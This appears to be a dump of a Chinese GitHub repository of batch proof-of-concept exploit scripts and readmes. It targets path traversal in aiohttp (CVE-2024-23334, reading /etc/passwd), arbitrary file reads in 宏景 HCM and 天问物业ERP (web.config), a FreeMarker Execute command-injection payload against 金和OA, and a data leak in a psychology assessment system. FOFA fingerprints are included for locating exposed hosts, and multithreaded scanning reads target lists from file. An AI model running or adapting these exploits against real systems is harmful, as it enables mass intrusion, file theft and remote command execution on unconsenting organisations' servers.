dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 九思OA软件user_list_3g.jsp存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | app="九思软件-OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 22 | 23 | ![image-20240202203022822](assets/image-20240202203022822.png) 24 | 25 | ## 入圈(限时体验) 26 | 27 | 28 | 29 | ![image-20240121123620660](assets/image-20240121123620660.png)s 30 | 31 | -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240307iohttp 目录遍历漏洞(CVE-2024-23334)/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 
| `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a iohttp 目录遍历漏洞(CVE-2024-23334)poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/static/../../../../../etc/passwd" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", 43 | "Connection": "close", 44 | "Accept": "*/*", 45 | "Accept-Language": "en", 46 | "Accept-Encoding": "gzip" 47 | } 48 | 49 | 50 | try: 51 | # conn = http.client.HTTPConnection(target) 52 | # conn.request("POST", path, body.encode("utf-8"), headers) 53 | # response1 = conn.getresponse() 54 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 55 | # print(response1.headers) 56 | 57 | if response1.status_code == 200 and "root" in response1.text: 58 | print(f"[++++++] {target} 存在 目录遍历漏洞") 59 | with open("result.txt", "a+", encoding="utf-8") as f: 60 | f.write(target + "\n") 61 | else: 62 | print(f"[-] {target} 未发现") 63 | 64 | except Exception as e: 65 | print(f"[*] {target} error: {str(e)}") 66 | 67 | 68 | def extract_host(url): 69 | """ 70 | 从 URL 中提取主机地址和端口号,返回 (host, port) 71 | """ 72 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 73 | if match: 74 | prefix, host, port = match.groups() 75 | if not port: 76 | if prefix and "https" in prefix: 77 | port = "443" 78 | else: 79 | port = "80" 80 | return host, int(port) 81 | else: 82 | return None, None 83 | 84 | 85 | def main(): 86 | banner() 87 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 88 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 89 | parser.add_argument("-f", "--file", dest="file", 
type=str, help=" urls.txt") 90 | args = parser.parse_args() 91 | 92 | if args.url and not args.file: 93 | if "https://" in args.url or "http://" in args.url: 94 | url = args.url 95 | else: 96 | host, port = extract_host(args.url) 97 | url = f"http://{host}:{port}" 98 | poc(url) 99 | 100 | elif args.url is None and args.file is not None: 101 | url_list = [] 102 | with open(args.file, "r", encoding="utf-8") as f: 103 | for url in f.readlines(): 104 | url = url.strip().replace("\n", "") 105 | if "https://" in url or "http://" in url: 106 | url = url 107 | else: 108 | host, port = extract_host(url) 109 | url = f"http://{host}:{port}" 110 | url_list.append(url) 111 | 112 | pool = Pool(10) 113 | pool.map(poc, url_list) 114 | pool.close() 115 | pool.join() 116 | 117 | else: 118 | parser.print_help() 119 | 120 | 121 | if __name__ == '__main__': 122 | main() 123 | -------------------------------------------------------------------------------- /20240307iohttp 目录遍历漏洞(CVE-2024-23334)/readme.md: -------------------------------------------------------------------------------- 1 | # iohttp 目录遍历漏洞(CVE-2024-23334) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | title=="ComfyUI" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | ## 入圈(限时体验) 26 | 27 | 28 | 29 | ![image-20240121123620660](assets/image-20240121123620660.png)s 30 | 31 | -------------------------------------------------------------------------------- /20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)/readme.md: -------------------------------------------------------------------------------- 1 | # JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | body="Log in to TeamCity" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240310宏景某接口存在任意文件读取漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 宏景某接口存在任意文件读取漏洞 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/templates/attestation/../../servlet/DisplayExcelCustomReport" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 43 | 'Content-Type': 'application/x-www-form-urlencoded' 44 | } 45 | data = { 46 | 'filename': '../webapps/hrms/templates/index/hcmlogon.jsp' 47 | } 48 | 49 | try: 50 | # conn = http.client.HTTPConnection(target) 51 | # conn.request("POST", path, body.encode("utf-8"), headers) 52 | # response1 = conn.getresponse() 53 | response1 = requests.post(url=url, headers=headers, data=data, verify=False, timeout=15) 54 | 55 | 56 | if response1.status_code == 200 : 57 | print(f"[++++++] {target} 存在 任意文件读取") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | else: 61 | print(f"[-] {target} 未发现") 62 | 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port 
= extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240310宏景某接口存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 宏景某接口存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="HJSOFT-HCM" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240311weiphp5.0存在远程代码执行漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240311weiphp5.0存在远程代码执行漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240311weiphp5.0存在远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # weiphp5.0存在远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
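body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0"

批量poc(记得安装库)

pip install argparse requests rich

python poc.py -u

python poc.py -f .txt

结果保存至result.txt

![image-20240307092017883](assets/image-20240307092017883.png)

--------------------------------------------------------------------------------
/20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/assets/image-20240307092017883.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/assets/image-20240307092017883.png
--------------------------------------------------------------------------------
/20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/poc.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import argparse
import base64
import re
import sys
import json
from multiprocessing.dummy import Pool
import requests
import urllib3
import hashlib
from rich.console import Console

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    """Print the tool banner: ASCII art, the PoC tag and the author line."""
    test = """
8b d8 88 88 a8P 88 888b 88 ,ad8888ba,
Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b
Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8'
"8aa8" 88 88,d88' 88 88 `8b 88 88
`88' 88 8888"88, 88 88 `8b 88 88 88888
88 88 88P Y8b 88 88 `8b 88 Y8, 88
88 88 88 "88, 88 88 `888 `"Y88888P"

888888888888

tag: this is a 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞
@version: 1.0.0 @author: Y1_K1NG
"""
    print(test)


def poc(target):
    """Probe one target for the path-traversal read in docfileDownLoad.aspx.

    Sends a GET for ``../web.config`` through the ``AdjunctFile`` parameter and,
    on a hit, prints the target and appends it to ``result.txt``.  Network and
    parsing errors are caught and printed so a batch run keeps going.

    The original check accepted any HTTP 200, which a login page, a custom
    error page or a generic handler answer also produces, so it flagged hosts
    that were not vulnerable.  The body is now additionally required to
    contain ``<configuration`` — the root element of an ASP.NET web.config.
    NOTE(review): validate this marker against a known-vulnerable instance and
    relax it if the file comes back in another form (e.g. HTML-escaped).
    """
    target = target.rstrip("/")  # tolerate a trailing slash (and an empty string)
    path = "/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config"
    url = target + path
    headers = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
        "Accept": "*/*",
        "Connection": "Keep-Alive"
    }

    try:
        response1 = requests.get(url=url, headers=headers, verify=False, timeout=15)

        if response1.status_code == 200 and "<configuration" in response1.text:
            print(f"[++++++] {target} 存在任意文件读取")
            with open("result.txt", "a+", encoding="utf-8") as f:
                f.write(target + "\n")
        else:
            print(f"[-] {target} 未发现")

    except Exception as e:
        print(f"[*] {target} error: {str(e)}")


def extract_host(url):
    """
    Pull (host, port) out of a loosely formatted target string.

    Accepts ``host``, ``host:port``, ``http://host[:port]`` and
    ``https://host[:port]``; anything after the host/port (a path, a query)
    is ignored.  The port defaults to 443 when an ``https://`` prefix is
    present and to 80 otherwise.  Returns ``(None, None)`` when no host can be
    found (e.g. an empty string).

    The host character class includes ``-`` because a word-character class
    does not: with the old pattern ``my-host.example.com`` was truncated to
    ``my``.  IPv6 literals are still not supported.
    """
    match = re.search(r"(https?://)?([\w.-]+)(?::(\d+))?", url)
    if not match:
        return None, None
    prefix, host, port = match.groups()
    if not port:
        port = "443" if prefix and "https" in prefix else "80"
    return host, int(port)


def main():
    """CLI entry point: scan one target (-u) or every target listed in a file (-f).

    A scheme-less target is normalised to ``http://host:port`` via
    ``extract_host``; with ``-u`` a target that cannot be parsed is reported
    and skipped instead of being scanned as the bogus URL ``http://None:None``,
    and blank lines in the ``-f`` file are ignored.  Batch mode runs ``poc`` on
    ten worker threads; each appends its own line to ``result.txt`` through a
    separate file handle, so interleaved lines are unlikely but not guaranteed.
    """
    banner()
    parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227')
    parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com")
    parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt")
    args = parser.parse_args()

    if args.url and not args.file:
        if "https://" in args.url or "http://" in args.url:
            url = args.url
        else:
            host, port = extract_host(args.url)
            if host is None:
                print(f"[*] {args.url} error: cannot parse host")
                return
            url = f"http://{host}:{port}"
        poc(url)

    elif args.url is None and args.file is not None:
        url_list = []
        with open(args.file, "r", encoding="utf-8") as f:
            for url in f.readlines():
                url = url.strip().replace("\n", "")
                if not url:
                    continue  # blank line in the target list
                if "https://" in url or "http://" in url: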
url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | ``` 6 | body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx" 7 | ``` 8 | 9 | 批量poc(记得安装库) 10 | 11 | pip install argparse requests rich 12 | 13 | 14 | 15 | 16 | 17 | python poc.py -u 18 | 19 | python poc.py -f .txt 20 | 21 | 结果保存至result.txt 22 | 23 | 24 | 25 | ![image-20240307092017883](assets/image-20240307092017883.png) 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import 
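Console

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    """Print the tool banner: ASCII art, the PoC tag and the author line."""
    test = """
8b d8 88 88 a8P 88 888b 88 ,ad8888ba,
Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b
Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8'
"8aa8" 88 88,d88' 88 88 `8b 88 88
`88' 88 8888"88, 88 88 `8b 88 88 88888
88 88 88P Y8b 88 88 `8b 88 Y8, 88
88 88 88 "88, 88 88 `888 `"Y88888P"

888888888888

tag: this is a 金和OA portalwb-con-template-viewcontemplate 远程命令执行poc
@version: 1.0.0 @author: Y1_K1NG
"""
    print(test)


def poc(target):
    """Probe one target for the FreeMarker template injection in
    portalwb-con-template!viewConTemplate.action.

    WARNING: this is not a passive check.  The POST body instantiates
    ``freemarker.template.utility.Execute`` and asks the target to run
    ``xxxxxxxxx`` as an OS command; use it only against systems you are
    authorised to test.

    A hit is printed and appended to ``result.txt`` when the response is
    HTTP 200 and contains the marker.  NOTE(review): the marker is also part of
    the submitted template, so a server that reflects the request (for instance
    in a template-error page) may match without having executed anything —
    confirm hits manually.  Errors are caught and printed so a batch run keeps
    going.
    """
    target = target.rstrip("/")  # tolerate a trailing slash (and an empty string)
    path = "/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action"
    url = target + path
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    body = "moduId=1&code=${\"freemarker.template.utility.Execute\"?new()(\"xxxxxxxxx\")}&uuid=1"
    marker = "xxxxxxxxx"  # the Execute() argument; a weak signal, see the docstring

    try:
        response1 = requests.post(url=url, headers=headers, data=body, verify=False, timeout=15)

        if response1.status_code == 200 and marker in response1.text:
            print(f"[++++++] {target} 存在RCE")
            with open("result.txt", "a+", encoding="utf-8") as f:
                f.write(target + "\n")
        else:
            print(f"[-] {target} 未发现")

    except Exception as e:
        print(f"[*] {target} error: {str(e)}")


def extract_host(url):
    """
    Pull (host, port) out of a loosely formatted target string.

    Accepts ``host``, ``host:port``, ``http://host[:port]`` and
    ``https://host[:port]``; anything after the host/port (a path, a query)
    is ignored.  The port defaults to 443 when an ``https://`` prefix is
    present and to 80 otherwise.  Returns ``(None, None)`` when no host can be
    found (e.g. an empty string).

    The host character class includes ``-`` because a word-character class
    does not: with the old pattern ``my-host.example.com`` was truncated to
    ``my``.  IPv6 literals are still not supported.
    """
    match = re.search(r"(https?://)?([\w.-]+)(?::(\d+))?", url)
    if not match:
        return None, None
    prefix, host, port = match.groups()
    if not port:
        port = "443" if prefix and "https" in prefix else "80"
    return host, int(port)


def _normalize_target(raw):
    """Return ``raw`` unchanged when it already carries a scheme, otherwise
    ``http://host:port`` built from ``extract_host``; ``None`` when no host
    could be extracted (empty or unparsable input)."""
    if "https://" in raw or "http://" in raw:
        return raw
    host, port = extract_host(raw)
    if host is None:
        return None
    return f"http://{host}:{port}"


def main():
    """CLI entry point: scan one target (-u) or every target listed in a file (-f).

    Scheme-less targets are normalised to ``http://host:port``; a target that
    cannot be parsed is reported and skipped rather than scanned as the bogus
    URL ``http://None:None`` (the original behaviour), and blank lines in the
    ``-f`` file are ignored.  Batch mode runs ``poc`` on ten worker threads;
    each appends its own line to ``result.txt`` through a separate file
    handle, so interleaved lines are unlikely but not guaranteed.
    """
    banner()
    parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227')
    parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com")
    parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt")
    args = parser.parse_args()

    if args.url and not args.file:
        url = _normalize_target(args.url)
        if url is None:
            print(f"[*] {args.url} error: cannot parse host")
            return
        poc(url)

    elif args.url is None and args.file is not None:
        url_list = []
        with open(args.file, "r", encoding="utf-8") as f:
            for line in f:
                raw = line.strip()
                if not raw:
                    continue  # blank line in the target list
                url = _normalize_target(raw)
                if url is None:
                    print(f"[*] {raw} error: cannot parse host")
                    continue
                url_list.append(url)

        pool = Pool(10)
        pool.map(poc, url_list)
        pool.close()
        pool.join()

    else:
        parser.print_help()


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行/readme.md:
--------------------------------------------------------------------------------
# 金和OA portalwb-con-template-viewcontemplate 远程命令执行

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!!

fofa: app="金和网络-金和OA"

批量poc(记得安装库)

pip install argparse requests rich

python poc.py -u

python poc.py -f .txt

结果保存至result.txt

![image-20240307092017883](assets/image-20240307092017883.png)

--------------------------------------------------------------------------------
/20240318京师心智心理健康测评系统-存在敏感信息泄露/assets/image-20240307092017883.png: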
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240318京师心智心理健康测评系统-存在敏感信息泄露/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240318京师心智心理健康测评系统-存在敏感信息泄露/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 京师心智心理健康测评系统-存在敏感信息泄露 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0", 43 | } 44 | 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | 53 | if response1.status_code == 200: 54 | print(f"[++++++] {target} 存在敏感信息泄露") 55 | with open("result.txt", "a+", 
encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240318京师心智心理健康测评系统-存在敏感信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # 京师心智心理健康测评系统-存在敏感信息泄露 2 | 3 | 
